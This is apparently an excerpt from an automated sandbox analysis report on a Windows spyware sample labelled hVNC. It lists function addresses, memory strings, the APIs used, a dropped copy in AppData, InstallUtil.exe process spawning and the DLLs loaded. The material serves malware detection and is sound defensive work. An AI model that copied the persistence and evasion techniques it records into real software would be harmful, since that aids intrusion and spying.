Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA0040 5_2_06AA0040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AA7939 5_2_06AA7939
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AE8F49 5_2_06AE8F49
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AE8F58 5_2_06AE8F58
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AEEDE0 5_2_06AEEDE0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AEEDD0 5_2_06AEEDD0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AEF380 5_2_06AEF380
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AEF370 5_2_06AEF370
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFB548 5_2_06AFB548
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF6AF0 5_2_06AF6AF0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF8088 5_2_06AF8088
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFB538 5_2_06AFB538
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF52A8 5_2_06AF52A8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF52A5 5_2_06AF52A5
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF6ADF 5_2_06AF6ADF
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF7210 5_2_06AF7210
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF1278 5_2_06AF1278
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AF8082 5_2_06AF8082
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06B1877A 5_2_06B1877A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06B10006 5_2_06B10006
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06B10040 5_2_06B10040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06EDD890 5_2_06EDD890
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06EDCCA8 5_2_06EDCCA8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06EC0040 5_2_06EC0040
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06EC0006 5_2_06EC0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_00D34010 8_2_00D34010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_00D31598 8_2_00D31598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_00D315A8 8_2_00D315A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_00D33DDB 8_2_00D33DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F34570 8_2_04F34570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F3C798 8_2_04F3C798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F348D0 8_2_04F348D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F3BB80 8_2_04F3BB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F34560 8_2_04F34560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F396C6 8_2_04F396C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F39778 8_2_04F39778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F3BEC8 8_2_04F3BEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_04F348C3 8_2_04F348C3
Sample file is different than original file name gathered from version info
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.000000000102E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1742387770.00000000060E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000000.1682024434.0000000000972000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.000000000327F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlljiryo.exe" vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003EF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Uses 32bit PE files
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs Cryptographic APIs: 'CreateDecryptor'
Source: hvnc-CR-SCR-0710.bin.exe, TaskMessageMessage.cs Task registration methods: 'RegisterProxy'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.spyw.evad.winEXE@9/5@4/5
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe File created: C:\Users\user\AppData\Roaming\msql2.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\2a6c98df8e
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hvnc-CR-SCR-0710.bin.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: hvnc-CR-SCR-0710.bin.exe ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe Virustotal: Detection: 34%
Source: hvnc-CR-SCR-0710.bin.exe String found in binary or memory: g(2) = -Start from the license
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe File read: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe "C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winhttp.dll Jump to behavior
